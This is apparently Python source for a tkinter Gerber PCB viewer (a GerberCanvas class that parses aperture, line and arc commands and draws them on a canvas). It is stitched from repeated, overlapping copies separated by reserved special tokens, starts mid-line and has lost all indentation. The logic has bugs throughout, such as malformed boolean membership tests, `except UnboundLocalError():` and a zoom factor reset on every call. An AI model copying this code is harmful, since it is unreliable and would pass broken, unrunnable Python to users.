',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GerberCanvas:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
def load_gerber(self, path, file):
"""load gerber file
:param path: path to the file
:param file: file name to use
"""
try:
all_ids = self.my_canvas.find_all()
if all_ids:
try:
for item in all_ids:
print(item)
self.my_canvas.delete(item)
except tk.TclError:
messagebox.showerror('Error', tk.TclError)
if path:
self.file_gto = True
try:
with open(os.path.join(path, file), 'r') as gerber_file:
self.file_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_commands)
self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
self.gerber_file_name = file
self.scaled = False
if DEBUG:
print('Scroll region is : ', self.bounding_box_size)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTO')
finally:
self.file_gto = False
self.load_gerber_gtp(os.path.join(path, file))
self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DEBUG = False
class GerberCanvas:
file_gto = False
file_gtp = False
units = 0
units_string = 'i', 'm'
"""
my canvas
"""
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {}
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.
my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.
HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,
yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
def load_gerber(self, path, file):
"""load gerber file
:param path: path to the file
:param file: file name to use
"""
try:
all_ids = self.my_canvas.find_all()
if all_ids:
try:
for item in all_ids:
print(item)
self.my_canvas.delete(item)
except tk.TclError:
messagebox.showerror('Error', tk.TclError)
if path:
self.file_gto = True
try:
with open(os.path.join(path, file), 'r') as gerber_file:
self.file_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_commands)
self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
self.gerber_file_name = file
self.scaled = False
if DEBUG:
print('Scroll region is : ', self.bounding_box_size)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTO')
finally:
self.file_gto = False
self.load_gerber_gtp(os.path.join(path, file))
self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines(
)
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D':
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value:
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x) / 2)
elif 'C,' in value:
print(value)
self.current_aperture = self.__get_circle_diameter(
value)
elif 'O,' in value:
pass
elif 'P,' in value:
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.
units_string[GerberCanvas.units], str(y0) +
GerberCanvas.units_string[GerberCanvas.units], str(
x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.
units], outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
if self.file_gto:
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x,
',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.
start_y + 'i', self.x + 'i', self.y + 'i', width=
self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x -
radius) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], outline='black', width=self.
current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
break
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(
self.start_y) - cp_y, float(self.start_x) -
cp_x))
end_angle = math.degrees(math.atan2(float(self.
y) - cp_y, float(self.x) - cp_x))
try:
self.my_canvas.create_arc(str(cp_x + radius
) + GerberCanvas.units_string[
GerberCanvas.units], str(cp_y + radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_x - radius) +
GerberCanvas.units_string[GerberCanvas.
units], str(cp_y - radius) +
GerberCanvas.units_string[GerberCanvas.
units], style=tk.ARC, width=self.
current_aperture, start=start_angle,
extent=end_angle - start_angle, outline
='black')
except UnboundLocalError():
messagebox.showwarning('Warning',
'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x + 1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y),
float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = 1 - distance ** 2 / (2 * radius ** 2)
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start + 1:j_start]
j_temp = item[j_start + 1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start + 1:y_start]
y_temp = item[y_start + 1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start + 1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
